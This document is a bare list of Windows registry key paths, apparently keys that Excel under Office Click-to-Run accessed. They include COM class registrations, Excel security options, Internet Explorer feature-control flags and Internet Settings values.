HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID
HKEY_CURRENT_USER\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\MGOTFlags
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ProcessMitigationPolicy
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ProtectionLevel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UndoHistory
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargePivotTables
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoRowThousandCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargeDataModels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoDataModelSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PreferExcelDataModel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSuggestCompatFmlaVariation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableIdleMemoryFlush
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableEDPIsIdentityManagedGate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\PrintInProtectedView
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\Software\Microsoft\MRUS\Profiles
HKEY_LOCAL_MACHINE\Software\Microsoft\MRUS\Office365
HKEY_LOCAL_MACHINE\Software\FSLogix\Profiles
HKEY_LOCAL_MACHINE\Software\Policies\FSLogix\ODFC
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateOnHostFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
